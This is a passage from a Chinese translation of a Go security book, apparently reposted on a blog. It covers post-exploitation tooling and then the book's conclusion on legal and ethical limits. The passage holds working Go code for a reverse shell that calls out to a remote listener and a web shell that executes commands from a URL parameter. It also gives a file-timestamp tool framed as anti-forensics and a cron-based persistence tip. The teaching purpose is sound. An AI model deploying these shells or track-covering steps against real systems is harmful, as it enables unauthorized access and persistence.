反向绑定 shell 克服了防火墙和 NAT 的问题。它不是监听传入连接,而是向远程服务器(你控制并监听的服务器)拨号。当你在自己的机器上收到连接时,你就有了一个在防火墙后面的计算机上运行的 shell。

这个示例使用明文 TCP 套接字,但你可以很容易地用tls.Dial()替换net.Dial()。第六章,密码学,有 TLS 客户端和服务器的示例,如果你想修改这些示例来使用 TLS。

// Call back to a remote server and open a shell session
package main

import (
   "fmt"
   "log"
   "net"
   "os"
   "os/exec"
)

var shell = "/bin/sh"

func main() {
   // Handle command line arguments
   if len(os.Args) < 2 {
      fmt.Println("Usage: " + os.Args[0] + " <remoteAddress>")
      fmt.Println("Example: " + os.Args[0] + " 192.168.0.27:9999")
      os.Exit(1)
   }

   // Connect to remote listener
   remoteConn, err := net.Dial("tcp", os.Args[1])
   if err != nil {
      log.Fatal("Error connecting. ", err)
   }
   log.Println("Connection established. Launching shell.")

   command := exec.Command(shell)
   // Take advantage of reader/writer interfaces to tie inputs/outputs
   command.Stdin = remoteConn
   command.Stdout = remoteConn
   command.Stderr = remoteConn
   command.Run()
} 

创建 Web shell

Web shell 类似于绑定 shell,但是它不是作为原始 TCP 套接字进行监听和通信,而是作为 HTTP 服务器进行监听和通信。这是一种创建对机器持久访问的有用方法。

Web shell 可能是必要的一个原因是防火墙或其他网络限制。HTTP 流量可能会与其他流量有所不同。有时,80443端口是防火墙允许的唯一端口。一些网络可能会检查流量,以确保只有 HTTP 格式的请求被允许通过。

请记住,使用纯 HTTP 意味着流量可以以纯文本形式记录。可以使用 HTTPS 加密流量,但 SSL 证书和密钥将驻留在服务器上,因此服务器管理员将可以访问它。要使此示例使用 SSL,只需将http.ListenAndServe()更改为http.ListenAndServeTLS()。第九章中提供了此示例,Web 应用程序

Web shell 的便利之处在于您可以使用任何 Web 浏览器和命令行工具,例如curlwget。您甚至可以使用netcat并手动创建 HTTP 请求。缺点是您没有真正的交互式 shell,并且一次只能发送一个命令。如果使用分号分隔多个命令,可以在一个字符串中运行多个命令。

您可以像这样手动创建netcat或自定义 TCP 客户端的 HTTP 请求:

GET /?cmd=whoami HTTP/1.0\n\n  

这将类似于由 Web 浏览器创建的请求。例如,如果您运行webshell localhost:8080,您可以访问端口8080上的 URL,并使用http://localhost:8080/?cmd=df运行命令。

请注意,/bin/sh shell 命令适用于 Linux 和 Mac。Windows 使用cmd.exe命令提示符。在 Windows 中,您可以启用 Windows 子系统并从 Windows 商店安装 Ubuntu,以在不安装虚拟机的情况下在 Linux 环境中运行所有这些 Linux 示例。

在下一个示例中,Web shell 创建一个简单的 Web 服务器,通过 HTTP 监听请求。当它收到请求时,它会查找名为cmdGET查询。它将执行一个 shell,运行提供的命令,并将结果作为 HTTP 响应返回:

package main

import (
   "fmt"
   "log"
   "net/http"
   "os"
   "os/exec"
)

var shell = "/bin/sh"
var shellArg = "-c"

func main() {
   if len(os.Args) != 2 {
      fmt.Printf("Usage: %s <listenAddress>\n", os.Args[0])
      fmt.Printf("Example: %s localhost:8080\n", os.Args[0])
      os.Exit(1)
   }

   http.HandleFunc("/", requestHandler)
   log.Println("Listening for HTTP requests.")
   err := http.ListenAndServe(os.Args[1], nil)
   if err != nil {
      log.Fatal("Error creating server. ", err)
   }
}

func requestHandler(writer http.ResponseWriter, request *http.Request) {
   // Get command to execute from GET query parameters
   cmd := request.URL.Query().Get("cmd")
   if cmd == "" {
      fmt.Fprintln(
         writer,
         "No command provided. Example: /?cmd=whoami")
      return
   }

   log.Printf("Request from %s: %s\n", request.RemoteAddr, cmd)
   fmt.Fprintf(writer, "You requested command: %s\n", cmd)

   // Run the command
   command := exec.Command(shell, shellArg, cmd)
   output, err := command.Output()
   if err != nil {
      fmt.Fprintf(writer, "Error with command.\n%s\n", err.Error())
   }

   // Write output of command to the response writer interface
   fmt.Fprintf(writer, "Output: \n%s\n", output)
} 

查找可写文件

一旦您获得对系统的访问权限,您就会开始探索。通常,您会寻找提升权限或保持持久性的方法。寻找持久性方法的一个好方法是识别哪些文件具有写权限。

您可以查看文件权限设置,看看您或其他人是否具有写权限。您可以明确寻找777等模式,但更好的方法是使用位掩码,专门查看写权限位。

权限由几个位表示:用户权限,组权限,最后是每个人的权限。0777权限的字符串表示看起来像这样:-rwxrwxrwx。我们感兴趣的位是给每个人写权限的位,由--------w-表示。

第二位是我们关心的唯一位,因此我们将使用按位与运算符将文件的权限与0002进行掩码。如果该位已设置,它将保持为唯一设置的位。如果关闭,则保持关闭,整个值将为0。要检查组或用户的写位,可以分别使用按位与运算符00200200

要在目录中进行递归搜索,Go 提供了标准库中的path/filepath包。此函数只需一个起始目录和一个函数。它对找到的每个文件执行该函数。它期望的函数实际上是一个特别定义的类型。它的定义如下:

type WalkFunc func(path string, info os.FileInfo, err error) error  

只要创建一个与此格式匹配的函数,您的函数就与WalkFunc类型兼容,并且可以在filepath.Walk()函数中使用。

在下一个示例中,我们将遍历一个起始目录并检查每个文件的文件权限。我们还将涵盖子目录。任何当前用户可写的文件都将打印到标准输出:

package main

import (
   "fmt"
   "log"
   "os"
   "path/filepath"
)

func main() {
   if len(os.Args) != 2 {
      fmt.Println("Recursively look for files with the " + 
         "write bit set for everyone.")
      fmt.Println("Usage: " + os.Args[0] + " <path>")
      fmt.Println("Example: " + os.Args[0] + " /var/log")
      os.Exit(1)
   }
   dirPath := os.Args[1]

   err := filepath.Walk(dirPath, checkFilePermissions)
   if err != nil {
      log.Fatal(err)
   }
}

func checkFilePermissions(
   path string,
   fileInfo os.FileInfo,
   err error,
) error {
   if err != nil {
      log.Print(err)
      return nil
   }

   // Bitwise operators to isolate specific bit groups
   maskedPermissions := fileInfo.Mode().Perm() & 0002
   if maskedPermissions == 0002 {
      fmt.Println("Writable: " + fileInfo.Mode().Perm().String() + 
         " " + path)
   }

   return nil
} 

更改文件时间戳

以相同的方式,您可以修改文件权限,也可以修改时间戳,使其看起来像是在过去或未来修改过。这对于掩盖您的行踪并使其看起来像是很长时间没有被访问的文件,或者设置为将来的日期以混淆取证人员可能很有用。Go os包包含了修改文件的工具。

在下一个示例中,文件的时间戳被修改以看起来像是在未来修改过。您可以调整futureTime变量,使文件看起来已经修改到任何特定时间。该示例通过在当前时间上添加 50 小时 15 分钟来提供相对时间,但您也可以指定绝对时间:

package main

import (
   "fmt"
   "log"
   "os"
   "time"
)

func main() {
   if len(os.Args) != 2 {
      fmt.Printf("Usage: %s <filename>", os.Args[0])
      fmt.Printf("Example: %s test.txt", os.Args[0])
      os.Exit(1)
   }

   // Change timestamp to a future time
   futureTime := time.Now().Add(50 * time.Hour).Add(15 * time.Minute)
   lastAccessTime := futureTime
   lastModifyTime := futureTime
   err := os.Chtimes(os.Args[1], lastAccessTime, lastModifyTime)
   if err != nil {
      log.Println(err)
   }
} 

更改文件权限

更改文件权限以便以后可以从低权限用户访问文件也可能很有用。该示例演示了如何使用os包更改文件权限。您可以使用os.Chmod()函数轻松更改文件权限。

该程序命名为chmode.go,以避免与大多数系统提供的默认chmod程序发生冲突。它具有与chmod相同的基本功能,但没有任何额外功能。

os.Chmod()函数很简单,但必须提供os.FileMode类型。os.FileMode类型只是一个uint32类型,因此您可以提供一个uint32文字(硬编码数字),或者您必须确保您提供的文件模式值被转换为os.FileMode类型。在这个示例中,我们将从命令行提供的字符串值(例如,"777")转换为无符号整数。我们将告诉strconv.ParseUint()将其视为 8 进制数而不是 10 进制数。我们还为strconv.ParseUint()提供了一个 32 的参数,以便我们得到一个 32 位的数字而不是 64 位的数字。在我们从字符串值获得一个无符号 32 位整数之后,我们将其转换为os.FileMode类型。这就是标准库中os.FileMode的定义方式:

type FileMode uint32  

在下一个示例中,文件的权限将更改为作为命令行参数提供的值。它类似于 Linux 中的chmod程序,并以八进制格式接受权限:

package main

import (
   "fmt"
   "log"
   "os"
   "strconv"
)

func main() {
   if len(os.Args) != 3 {
      fmt.Println("Change the permissions of a file.")
      fmt.Println("Usage: " + os.Args[0] + " <mode> <filepath>")
      fmt.Println("Example: " + os.Args[0] + " 777 test.txt")
      fmt.Println("Example: " + os.Args[0] + " 0644 test.txt")
      os.Exit(1)
   }
   mode := os.Args[1]
   filePath := os.Args[2]

   // Convert the mode value from string to uin32 to os.FileMode
   fileModeValue, err := strconv.ParseUint(mode, 8, 32)
   if err != nil {
      log.Fatal("Error converting permission string to octal value. ", 
         err)
   }
   fileMode := os.FileMode(fileModeValue)

   err = os.Chmod(filePath, fileMode)
   if err != nil {
      log.Fatal("Error changing permissions. ", err)
   }
   fmt.Println("Permissions changed for " + filePath)
} 

更改文件所有权

该程序将获取提供的文件并更改用户和组所有权。这可以与查找您有权限修改的文件的示例一起使用。

Go 在标准库中提供了os.Chown(),但它不接受用户和组名称的字符串值。用户和组必须以整数 ID 值提供。幸运的是,Go 还带有一个os/user包,其中包含根据名称查找 ID 的函数。这些函数是user.Lookup()user.LookupGroup()

您可以使用idwhoamigroups命令在 Linux/Mac 上查找自己的用户和组信息。

请注意,这在 Windows 上不起作用,因为所有权的处理方式不同。以下是此示例的代码实现:

package main

import (
   "fmt"
   "log"
   "os"
   "os/user"
   "strconv"
)

func main() {
   // Check command line arguments
   if len(os.Args) != 4 {
      fmt.Println("Change the owner of a file.")
      fmt.Println("Usage: " + os.Args[0] + 
         " <user> <group> <filepath>")
      fmt.Println("Example: " + os.Args[0] +
         " dano dano test.txt")
      fmt.Println("Example: sudo " + os.Args[0] + 
         " root root test.txt")
      os.Exit(1)
   }
   username := os.Args[1]
   groupname := os.Args[2]
   filePath := os.Args[3]

   // Look up user based on name and get ID
   userInfo, err := user.Lookup(username)
   if err != nil {
      log.Fatal("Error looking up user "+username+". ", err)
   }
   uid, err := strconv.Atoi(userInfo.Uid)
   if err != nil {
      log.Fatal("Error converting "+userInfo.Uid+" to integer. ", err)
   }

   // Look up group name and get group ID
   group, err := user.LookupGroup(groupname)
   if err != nil {
      log.Fatal("Error looking up group "+groupname+". ", err)
   }
   gid, err := strconv.Atoi(group.Gid)
   if err != nil {
      log.Fatal("Error converting "+group.Gid+" to integer. ", err)
   }

   fmt.Printf("Changing owner of %s to %s(%d):%s(%d).\n",
      filePath, username, uid, groupname, gid)
   os.Chown(filePath, uid, gid)
} 

摘要

阅读完本章后,您现在应该对攻击的后期利用阶段有了高层次的理解。通过实例的操作并扮演攻击者的心态,您应该对如何保护您的文件和网络有了更好的理解。这主要是关于持久性和信息收集。您还可以使用被攻击的机器执行来自第十一章 主机发现和枚举的所有示例。

绑定 shell、反向绑定 shell 和 Web shell 是攻击者用来保持持久性的技术示例。即使你永远不需要使用绑定 shell,了解它以及攻击者如何使用它是很重要的,如果你想识别恶意行为并保持系统安全。你可以使用第十一章中的端口扫描示例,主机发现和枚举,来搜索具有监听绑定 shell 的机器。你可以使用第五章中的数据包捕获和注入来查找传出的反向绑定 shell。

找到可写文件可以为你提供浏览文件系统所需的工具。Walk()函数演示非常强大,可以适应许多用例。你可以轻松地将其调整为搜索具有不同特征的文件。例如,也许你想将搜索范围缩小到查找由 root 拥有但对你也可写的文件,或者你想找到特定扩展名的文件。

你刚刚获得访问权限的机器上还有什么其他东西会吸引你的注意吗?你能想到其他任何重新获得访问权限的方法吗?Cron 作业是一种可以执行代码的方法,如果你找到一个执行你有写权限的脚本的 cron 作业。如果你能修改一个 cron 脚本,那么你可能会每天都有一个反向 shell 呼叫你,这样你就不必维持一个活跃的会话,使用像netstat这样的工具更容易找到已建立的连接。

记住,无论何时进行测试或执行渗透测试都要负责任。即使你有完整的范围,你也必须理解你所采取的任何行动可能带来的后果。例如,如果你为客户执行渗透测试,并且你有完整的范围,你可能会在生产系统上发现一个漏洞。你可能考虑安装一个绑定 shell 后门来证明你可以保持持久性。如果我们考虑一个面向互联网的生产服务器,将一个绑定 shell 开放给整个互联网而没有加密和密码是非常不负责任的。如果你对某些软件或某些命令的后果感到不确定,不要害怕向有经验的人求助。

在下一章中,我们将回顾你在本书中学到的主题。我将提供一些关于使用 Go 进行安全性的思考,希望你能从本书中获得,并且我们将讨论接下来该做什么以及在哪里寻求帮助。我们还将再次反思使用本书信息涉及的法律、道德和技术边界。

第十四章:结论

总结你学到的主题

到目前为止,在这本书中,我们涵盖了关于 Go 和信息安全的许多主题。涵盖的主题对各种人都有用,包括开发人员、渗透测试人员、SOC 分析师、计算机取证分析师、网络和安全工程师以及 DevOps 工程师。以下是涵盖的主题的高层回顾:

  • Go 编程语言

  • 处理文件

  • 取证

  • 数据包捕获和注入

  • 密码学

  • 安全外壳(SSH)

  • 暴力破解

  • Web 应用程序

  • Web 抓取

  • 主机发现和枚举

  • 社会工程和蜜罐

  • 后渗透

关于 Go 的更多想法

Go 是一种很棒的语言,对于许多用例来说是一个可靠的选择,但和其他语言一样,并不是万能的语言。正如古话所说,“永远选择最适合的工具。”在整本书中,我们看到了 Go 和标准库的多才多艺。Go 在性能、生产可靠性、并发性和内存使用方面也很出色,但强大的静态类型系统可能会减慢开发速度,使得 Python 在简单概念验证方面更好。有趣的是,你可以通过用 Go 编写 Python 模块来扩展 Python。

在某些情况下,当你不想要垃圾收集器但需要编译最小的二进制文件时,C 编程语言可能是更好的选择。Go 确实提供了一个不安全的包,允许你绕过类型安全,但它并不像 C 语言那样提供那么多控制。Go 允许你包装 C 库并创建绑定,以便你可以利用任何没有 Go 等效的 C 库。

Go 和网络安全行业都显示出增长的迹象。Go 作为一种语言正在不断发展,语言的一些薄弱领域也开始出现有希望的迹象。例如,GUI 库(如 Qt 和 Gtk)正在被 Go 包装,而具有 3D 图形库(如 OpenGL)也有包装器。甚至移动开发也是可能的,并且不断改进。

标准库中还有其他有用的包,我们甚至没有涵盖,比如用于操作二进制数据的binary包,用于编码和解码 XML 文档的xml包,以及用于解析命令行参数的flag包。

我希望你从这本书中学到的东西

阅读完这本书后,你应该对标准库中提供的包有一个很好的了解,并且知道 Go 在开箱即用时有多么多才多艺。你应该可以放心地使用 Go 来完成各种任务,从简单的任务,比如处理文件和建立网络连接,到更高级的任务,比如抓取网站和捕获数据包。我还希望你能从中获得一些编写符合惯用法的 Go 代码的技巧。

提供的示例程序应该作为构建自己工具的参考。许多程序可以直接使用,并立即纳入你的工具包,而有些只是作为参考,帮助你执行常见任务。

注意法律、道德和技术边界

对于你对计算机或网络采取的任何行动,了解可能的后果至关重要。根据法律和司法管辖区的不同,可能会有法律边界,导致罚款或监禁。例如,在美国,《计算机欺诈和滥用法》(CFAA)使未经授权访问计算机成为非法行为。不要总是假设授权你进行渗透测试范围的客户有权授权你访问每台设备。公司可以租用物理服务器或在数据中心租用虚拟或物理空间,而这些设备并非所有权,因此你需要从其他来源获取授权。

还有一些道德边界需要注意,这些与法律边界不同。道德边界对一些人来说可能是一个灰色地带。例如,对于社会工程,如果你针对员工,你认为在工作时间之外尝试社会工程是可以接受的吗?向他们的个人邮箱发送钓鱼邮件是否可以接受?冒充另一名员工并对某人撒谎是否可以接受?道德的其他方面涉及你在受损服务器上的行为以及你对发现的数据的处理。如果在渗透测试期间泄露了客户数据,将其存储在离线位置是否可以接受?在渗透测试期间在客户的生产服务器上创建自己的用户是否可以接受?对于不同情况,有些人可能对道德边界的位置持不同意见。重要的是要意识到这些类型的事情,并在参与之前与任何客户讨论。

除了法律和道德方面,了解工具对服务器、网络、负载均衡器、交换机等的技术影响和物理负载也是至关重要的。确保在网络爬虫和暴力破丨解丨器上设置合理的限制。此外,确保记录和跟踪你所采取的任何行动,以便你可以撤销任何永久性的更改。如果你为客户执行渗透测试,你不应该在他们的服务器上留下不必要的文件。例如,如果你安装了一个反向绑定 shell,确保你卸载它。如果你修改了文件权限或安装了一个绑定 shell,请确保你没有让客户暴露在外部攻击之下。

在安全领域工作时有很多需要注意的事情,但很多都归结为常识和谨慎。尊重你攻击的服务器,如果你不明白后果,不要采取任何行动。如果不确定,寻求来自可信赖和有经验的同行或社区的指导。

接下来该做什么

开始建立你的工具箱和菜谱。使用对你有用的示例,并根据自己的需求进行定制。利用现有示例并加以扩展。你能想到其他的想法吗?你如何修改一些程序使其更有用?有没有一些示例在你自己的工具箱中可以直接使用?它们给了你其他自定义工具的想法吗?探索更多 Go 标准库并编写应用程序来填充你的工具箱。

开始练习并使用提供的一些工具。你可能需要找到或构建自己的测试网络,或者只是一个简单的虚拟机,或者找到一个漏洞赏金计划。如果你决定尝试漏洞赏金计划,请务必仔细阅读范围和规则。要将你的新工具和技能付诸实践,研究应用程序测试和网络渗透方法。如果你想成为一名渗透测试员或者只是想了解更多关于渗透测试方法和在安全实验室环境中的实践,那么我强烈推荐 Offensive Security 在www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/提供的Offensive Security Certified ProfessionalOSCP)课程。

获取帮助和学习更多

要了解更多关于 Go、其语言设计和规范以及标准库的信息,请查看以下链接:

社区是获取帮助和找到合作伙伴的好地方。在线社区和线下社区各有利弊。以下是一些寻求 Go 帮助的地方:

继续学习,应用从本书中学到的知识。编写自己的工具来实现目标。探索其他第三方包,或考虑包装或移植 Go 缺少的 C 库。尝试使用这种语言。最重要的是继续学习!

标签:log,err,nil,fmt,安全,Go,os
From: https://www.cnblogs.com/apachecn/p/18172886

相关文章

  • Go-Web-开发学习手册(全)
    GoWeb开发学习手册(全)原文:zh.annas-archive.org/md5/2756E08144D91329B3B7569E0C2831DA译者:飞龙协议:CCBY-NC-SA4.0前言感谢您购买本书。我们希望通过本书中的示例和项目,您能从GoWeb开发新手变成一个能够承担面向生产的严肃项目的人。因此,本书在相对较高的水平上涉及......
  • Go-编程实用手册(全)
    Go编程实用手册(全)原文:zh.annas-archive.org/md5/62FC08F1461495F0676A88A03EA0ECBA译者:飞龙协议:CCBY-NC-SA4.0前言本书将通过解决开发人员常见的问题来帮助您学习Go编程语言。您将首先安装Go二进制文件,并熟悉开发应用程序所需的工具。然后,您将操作字符串,并将它们用......
  • 【转载】Godot-GDExtension C++ 环境搭建 (Docker+MinGW/跨平台)
    本文原链接见 Godot-GDExtensionC++环境搭建(Docker+MinGW/跨平台)|Convexwf'sKirakiraBlog。Godot在4.X之后推出了GDExtension,通过第三方绑定扩展功能,目前官方支持的语言只有C++。通过使用GDExtensionC++编写扩展插件,可以作为库文件在Godot中交互使用。GDExten......
  • Django - 模型与数据库
    目录模型定义与数据迁移模型定义数据迁移模型定义与数据迁移模型定义ORM框架是一种程序技术,用于实现面向对面变成语言中不同类型系统的数据之间的转换。#index\model.pyfromdjango.dbimportmodels#Createyourmodelshere.classPersonInfo(models.Model):id......
  • Docker Build - ERROR: RUN go mod tidy
     =>ERROR[build13/14]RUNgomodtidy29.3s------>[build13/14]RUNgomodtidy:0.270go:findingmoduleforpackagegithub.......
  • 深入学习和理解Django视图层:处理请求与响应
    title:深入学习和理解Django视图层:处理请求与响应date:2024/5/417:47:55updated:2024/5/417:47:55categories:后端开发tags:Django请求处理响应生成模板渲染表单处理中间件异常处理第一章:Django框架概述1.1什么是Django?Django是一个高级的PythonWeb......
  • Golang:go-humanize将文件大小转换成Kb、Mb、Gb适合人类阅读的单位
    Golang:go-humanize将文件大小转换成Kb、Mb、Gb适合人类阅读的单位原创 吃个大西瓜 CodingBigTree 2024-05-0408:30 云南​最近去了昆明的教场中路体验了满屏蓝花楹,感受到了梦幻般的世界,随手拍了一张图,分享给大家,有时间可以去一趟,体验一次,顺便说一下,美女很多喔 ......
  • cryostat jvm 容器化环境安全的jfr管理工具
    cryostat属于一个jfr管理工具,由红帽团队开发,可以用来安全的管理容器环境中的jfr处理包含的工具operator 可以方便的集成到k8s,openshift中agent 可以实现cryostat发现以及jfr数据的推送grafanadatasource支持 数据grafanadatasource的一个插件,可以方便使用grafan......
  • 2024-05-04:用go语言,给定一个起始索引为0的字符串s和一个整数k。 要进行分割操作,直到字
    2024-05-04:用go语言,给定一个起始索引为0的字符串s和一个整数k。要进行分割操作,直到字符串s为空:选择s的最长前缀,该前缀最多包含k个不同字符;删除该前缀,递增分割计数。如果有剩余字符,它们保持原来的顺序。在操作之前,可以修改字符串s中的一个字符为另一个小写英文字母。在最佳情......
  • Django - 探究CBV视图
    目录数据显示视图基础视图TemplateView数据显示视图基础视图TemplateView视图类TemplateView是所有视图类里最基础的应用视图类,开发者可以直接调用应用视图类,它继承多个父类classTemplateView(TemplateResponseMixin,ContextMixin,View):"""Renderatemplate......